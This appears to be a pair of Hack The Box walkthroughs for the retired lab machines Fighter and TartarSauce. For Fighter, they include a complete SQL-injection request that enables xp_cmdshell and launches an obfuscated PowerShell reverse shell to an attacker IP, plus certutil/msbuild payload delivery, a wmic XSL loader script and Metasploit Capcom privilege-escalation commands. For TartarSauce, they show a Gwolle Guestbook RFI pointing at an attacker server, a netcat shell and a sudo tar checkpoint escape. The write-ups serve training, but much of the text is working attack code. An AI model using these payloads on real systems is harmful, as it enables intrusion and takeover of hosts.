Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.67 seconds

The Nmap output shows us that there is only 1 port open: 80(HTTP)

We find that port 80 is running http, so we open the IP in our browser.

In the homepage, we find the Domain name “streetfighterclub.htb”. We add the domain to our /etc/hosts file.

We don’t find anything new on the webpage, but further looking into the webpage we find that there might be subdomains available that will give us more clues. We intercept the request and send it to the intruder. We select where we want to brute force the request.

We select the wordlist, we use namelist.txt located in /usr/share/dnsrecon/.

After bruteforcing, we find a subdomain called “members.streetfighterclub.htb” that gave HTTP code 403.

We add the subdomain in /etc/hosts so that we can access the web site.

We open the webpage and got a 403 Forbidden error.

We now run a dirb scan on the members.streetfighter.htb and find a directory called “old”.

dirb http://members.streetfighterclub.htb/

We then find web pages inside that directory. As we know that it is IIS server we find “asp” files on the web server and find a page called “login.asp”.

dirb http://members.streetfighterclub.htb/old -X .asp

We open the web page and find a login page.

We enumerate the webpage and find that the web application is vulnerable to SQL injection.  We find username, password, and e-mail but were unable to login. So we tried command injection using SQL injection. We referred this link.

POST /old/verify.asp HTTP/1.1
Host: members.streetfighterclub.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://members.streetfighterclub.htb/old/Login.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 944
Connection: close
Cookie: ASPSESSIONIDACRSQCAA=PDDFFGAADNIIKGMMCKGJFIPB; Email=; Level=%2D1; Chk=1821; password=YWRtaW4%3D; username=YWRtaW4%3D
Upgrade-Insecure-Requests: 1

username=admin&password=admin&logintype=1%3bEXEC+sp_configure+'show+advanced+options',+1%3bRECONFIGURE+WITH+OVERRIDE%3bEXEC+sp_configure+'xp_cmdshell',+1%3bRECONFIGURE+WITH+OVERRIDE%3bdrop+table+fighter%3bcreate+table+fighter+(out+varchar(8000))%3binsert+into+fighter+(out)+execute+Xp_cMdsHelL+'C%3a\WIndOWs\sySwOw64\WINdOwspOweRshEll\v1.0\poWersHeLl.Exe+"$clIEnT+%3d+NEw-ObJect+SYstEm.nEt.SOckEts.TcPclIeNt(\"10.10.14.20\",80)%3b$stReAm+%3d+$clIEnT.GetsTrEam()%3b[byte[]]$bYtEs+%3d+0..65535|%25{0}%3bwHIle(($i+%3d+$stReAm.Read($bYtEs,+0,+$bYtEs.LEnGth))+-ne+0){%3b$dAta+%3d+(NEW-oBjecT+-TypeNAme+SYsTem.tExt.ASCIiENcoDing).GEtstRInG($bYtEs,0,+$i)%3b$sEndback+%3d+(iEX+$data+2>%261+|+OUt-stRing+)%3b$Sendback2+%3d+$sEndback+%2b+\"sH3lL+\"+%2b+(pWd).PAth+%2b+\"^>+\"%3b$senDbyte+%3d+([texT.eNCodIng]%3a%3aAScIi).GEtByTes($Sendback2)%3b$stReAm.WRite($senDbyte,0,$senDbyte.Length)%3b$stReAm.FLuSh()}%3b$clIEnT.CloSe()"'%3b&rememberme=ON&B1=Login

 

We set up our listener and got a reverse shell.

C:\Users\jacco>nc -lvp 80
listening on [any] 80 ...
connect to [10.10.14.20] from streetfighterclub.htb [10.10.10.72] 49440
whoami
fighter\sqlserv

We are not able to find anything on the target machine. So we try to convert our shell into meterpreter but are unable to run any exe file. So there was a firewall that didn’t allow us to run any exe file. We got a reference through this link on how to bypass this. We use the nps payload to create an XML file that will contain our payload (download from here).

We move into “c:\users\sqlserv” as we have a shell as user sqlserv.

We run the command provided by npc payload to start our listener.

msfconsole -r msbuild_nps.rc

We start our python HTTP Server to send our file to the target machine.

python -m SimpleHTTPServer 80

We download the file using certutil.exe on the target machine.

certutil.exe -urlcache -split -f http://10.10.14.3/msbuild_nps.xml msbuild_nps.xml

We then run the XML file we uploaded using msbuild.exe.

As soon as we run the file we get a meterpreter session. As we can see by running sysinfo we have a 32-bit meterpreter session on a 64-bit machine.

To convert it into 64-bit session, we check the processes and find the 64-bit running process. We then migrate our process to a 64-bit process and get a 64-bit session.

meterpreter > ps
meterpreter > migrate 2320

We still don’t find anything to escalate our privilege. As this machine on street fighter game, we try to google street fighter exploit and find that street fighter 5 has privilege escalation vulnerability. We find that street fighter has a service called Capcom, so we check if street fighter 5 is installed on the target machine.

sc query capcom

We find this Metasploit exploit here, we try to run it but are unable to get a shell as it gave an error stating that the system was not vulnerable. So we make changes to the code and comment out the section where it checks the OS version.

Now we are successfully able to run the exploit.

msf > use exploit/windows/local/capcom_sys_exec
msf exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/capcom_sys_exec) > set lhost tun0
msf exploit(windows/local/capcom_sys_exec) > set lport 80
msf exploit(windows/local/capcom_sys_exec) > set session 2
msf exploit(windows/local/capcom_sys_exec)> run

When we check the uid we find that we are successfully able to get administrative rights.

We enumerate the directories to find the flags and inside “c:\users\decoder\Desktop”, we find a file called “user.txt”. When we take look at the content of the file we find our first flag.

We move into c:\users\Administrator\Desktop and find a file called “root.exe”. We run it and find that it asks for a password. There is also a DLL file called “checkdll.dll”, as the password might be checked using this DLL file.

We download both the files into our system using meterpreter.

download root.exe /root/Desktop
download checkdll.dll /root/Desktop

We reverse engineer them using IDA and find that this program XOR’s 9 with each character of the variable aFmFeholH. Now analyzing with IDA tells us that the variable contains “FmfEhO1}h”.

So we create a c program that XOR’s 9 with each character of “FmfEhO1}h”.

We compile and run the file and get the password to be “OdioLaFeta”.

When we provide the password to the root.exe we get our final flag.

With help of Empire

bypass the defender starfighter_xsl from empire by Luis Vacas
For this we are going to develop a small python script that makes us run our .xsl and get empire agent :

root@kali:~/htb/fighter# python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
10.10.10.72 - - [26/Apr/2019 11:03:33] "GET /WOJO.XSL HTTP/1.1" 200 -
root@kali:~/htb/fighter# cat iron.py
from requests import *

params = {"username":"admin","password":"admin","B1":"LogIn","logintype":"1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cmDshEll', 1;RECONFIGURE WITH OVERRIDE;drop table mojones;create table mojones (out varchar(8000));;insert into mojones (out) execute xp_CmdSheLl 'start wmic process get brief /format:\"http://10.10.14.20:443/wojo.xsl\"';EXEC sp_configure 'xP_cMdShelL', 0;RECONFIGURE WITH OVERRIDE;"}

resp = post("http://members.streetfighterclub.htb/old/verify.asp",data=params,allow_redirects=False,cookies={"ASPSESSIONIDCARRRDBA":"IFMBKKKDLPNKELDDENPKDKNB"})
.
.

Let’s migrate the empire to metasploit:https://github.com/trustedsec/nps_payload (example of use)

1
2
3
cd C:\Users\sqlserv
upload /tmp/msbuild_nps.xml msbuild_nps.xml
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe msbuild_nps.xml


Author: Jacco Straathof

reference used: https://ironhackers.es/en/writeups/hackthebox/writeup-fighter-hackthebox/

 

HTB – TartarSauce

Today we are going to solve another CTF challenge “TarTarSauce”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of TarTarSauce is 10.10.10.88

Let’s start off with our basic nmap command to find out the open ports and services.

C:\Users\jacco>nmap -sC -sV -T4 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-08 15:13 W. Europe Summer Time
Nmap scan report for 10.10.10.88
Host is up (0.034s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.00 seconds
Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.

We don’t find anything on the webpage, so we run dirb to enumerate the directories. We find a directory called “/webservices/”. We further enumerate “/webservices/” as we don’t find anything in that directory.

Dirb scan gave us the directory called “/webservices/wp/” that hosts a WordPress site.

We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for the exploit and find that it is vulnerable to Remote File Inclusion (RFI).

Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication:  October 14, 2015  [without technical details]
Vendor Notification: October 14, 2015 
Vendor Patch: October 16, 2015 
Public Disclosure: November 4, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical 
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.  

HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

We follow the instructions according to the given POC on exploit-db and use the php-reverse-shell.php available on Kali Linux. We copy it to desktop and rename it to wp-load.php to execute our php shell using RFI. We start our python HTTP server to exploit RFI on the target machine.

c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.88 - - [08/Apr/2019 15:04:19] "GET /wp-load.php HTTP/1.0" 200 -
C:\Users\jacco>curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.20/

We set up our listener using netcat; as soon as we execute our php shell through RFI, we are successfully able to get a reverse shell. We go to “/home” directory and find a folder called “onuma”. We are unable to access the “onuma” directory. So we spawn a tty shell using python to check the sudoers list.We check the sudoers list and find that we can run tar as user “onuma” without any password. Hence we can exploit wild card injection for privilege escalation.

We’ll take advantage of the tar options for checkpoints. The --checkpoint=x flag tells tar to take some action every x bytes, as a progress update. The default behavior is to print a status message. However, the --checkpoint-action parameter allows the user to specify what action to take at a check point. So I can have it just give me a shell:

C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.88: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.88] 58770: NO_DATA
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux
10:06:50 up 16:51, 0 users, load average: 0.01, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@TartarSauce:/$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash <ll /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
onuma@TartarSauce:/$ id
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
onuma@TartarSauce:/$ ls
ls
bin dev home lib media opt root sbin srv tmp var
boot etc initrd.img lost+found mnt proc run snap sys usr vmlinuz
onuma@TartarSauce:/$ cat /home/onuma/user.txt
cat /home/onuma/user.txt
b2d*****2c7

i use pspy for processes detection. here, letting pspy32 run for a bit shows a script that runs as root every 5 minutes:

2018/05/29 07:56:33 CMD: UID=0    PID=24065  | /bin/bash /usr/sbin/backuperer

Enumerating through the system we find a file a called a backuperer that has been symlinked to a file a named “backup” in “/usr/local/bin directory”.

We take a look at the content of the file and find that it is a file that creates a gzip archive of files inside “/var/www/html/”. It also checks the integrity of the file after 30 seconds from the creation of the file.

We use a script that takes advantage of the “sleep” function of the script. As it waits for 30 seconds and then checks the integrity of the file we have 30 seconds to recreate the archive. We use this script here.  After running the script we find the root flag.

Author: Sayantan Bera